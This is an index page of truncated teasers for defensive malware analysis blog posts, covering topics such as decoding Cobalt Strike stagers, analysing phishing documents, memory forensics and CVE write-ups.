2021-09-27 15:37   CVE-2021-38647 OMIGod Exploitation Log Analysis using Kusto Query Language    #NULL0X4D5A #安全文章 INTRODUCTIONThis post walks you through the log analysis of OMIGod vulnerability exploitation artefacts using kusto query language (KQL). The raw json logs from exploited linux device are fetched into Azure KQL data explorer using externaldata() function and analysed in KQL instance. I have been lea

2021-02-12 17:57   CyberChef - YARA - The pattern matching swiss knife    #NULL0X4D5A #安全文章 One of the best features of Cyberchef is YARA and yara rules can be run for a given file to classify and gain knowledge about the file. It can also quickly give an understanding and basic characteristics of the fileFollow the below demo to know how to use yara rules in cyberchef Cyberchef - htt

2020-09-28 16:55   Decode FIN6 Cobalt Strike stagers    #NULL0X4D5A #安全文章 This post explains about decoding FIN6 cobalt strike stagers using cyberchef and scdbg. Attackers leverage pastebin to host cobalt strike stagers or malicious droppers and few of them are still active on pastebin though the final c2 or  domains are not active. Below is one of those pastebin htt

2020-07-20 03:52   Dridex shellcode analysis using scdbg    #NULL0X4D5A #安全文章 This post explains how to use scdbg to analyse one type of shellcode generated by Metasploit framework or CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infec

2019-06-27 13:31   Decoding Metasploit and CobaltStrike shells    #NULL0X4D5A #安全文章 IntroductionThis post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector

2019-02-01 19:18   Mimikatz Process Doppleganging    #NULL0X4D5A #安全文章 This post is just about running a tool created by hasherezade to perform process doppleganging.All credit goes to the researchers Tal Liberman  and Eugene Kogan from enSilo and also hasherezadeI just wanted to simulate the same process doppleganging and detect with pe-sieve,

2019-01-26 17:22   Maldoc external relatonship with type oleobject    #NULL0X4D5A #安全文章 Introduction Phishing malicious documents can contain external relationship with type oleobject. A defender objective is to kill the attack at the early stage by blocking malicious domains at perimeter, this post levarages Cyberchef  to extract payload urls quickly from malicious

2018-12-18 17:50   Malicious office doc with process hollowing shellcode    #NULL0X4D5A #安全文章 Introduction This post covers how to identify and extract shellcode manually from hancitor phishing office document. Refer Part-1 and Part-2 to get an understanding of  tools and approach to analyse phishing documents. Tools Didier Stevens Suite  sud

2018-07-19 21:43   Malicious office document analysis Part-3    #NULL0X4D5A #安全文章 IntroductionThis post covers how to identify and extract potential malicious content like embedded executable and payloads from Macro forms in office documents. Refer Part-1 and Part-2 to get an understanding of  tools and approach to analyse phishing documents.Tools Didier Stevens Suite&n

2018-06-16 03:18   Malicious document analysis Part-2    #NULL0X4D5A #安全文章 Introduction A basic and quick approach to analyse phishing documents to identify indicators of maliciousness. Refer Part-1 to understand the tools and approach to analyse office word document. This post covers the  static analysis of pdf document to identify suspicious objects. (FYI&

2018-04-09 01:24   Malicious document analysis Part - 1    #NULL0X4D5A #安全文章 Introduction A basic and quick approach to analyse phishing documents to identify indicators of maliciousness. FYI this post doesn't cover complete & in depth analysis of malicious documentsTools Didier Stevens Suite  sudo pip install oletools Yara - A pattern matching Swiss

2018-03-17 00:50   Memory dump analysis of Donny's System    #NULL0X4D5A #安全文章 Introduction This post solves the mystery of Donny's System  and outlines how to utilize memory forensics methodology to uncover artifacts from memory dumpsTools: Volatility, Yara  & Windows PowershellAnalysisSix-step investigative methodology by SANSIdentify rogue processes&

2018-01-24 04:12   What happened ..??    #NULL0X4D5A #安全文章 Introduction Below is the memory dump of Donny's system. He's not happy with what's going on it :(.Find What's happened ?Link: https://mega.nz/#F!0moF0RaC!H2W9tUNs5Pjk1PA_p7dudASHA256: 3E4FF07DA0D18E0387D0A6E8A0FA936974A652EB30D1FB3A4E61CA391E731944Hint: Use Volatility or Rekall Memor

2018-01-04 23:13   CVE-2017-11882 technical analysis    #NULL0X4D5A #安全文章 Introduction This post explains how to analyse an office RTF document to identify CVE-2017-11882 vulnerability.Microsoft Equation Editor is a Microsoft Office component, contains a stack buffer overflow vulnerability that enables remote code execution on a vulnerable system. The component was c

2017-11-01 21:04   Extracting encrypted contents from Kronos Banking Trojan    #NULL0X4D5A #安全文章 Introduction This post explains how to identify and extract encrypted contents stashed away in the Resource section of malware. It's a common technique used by malware authors  to make analysis more difficult and the current analysis uses pestudio for initial analysis, using signsrch to id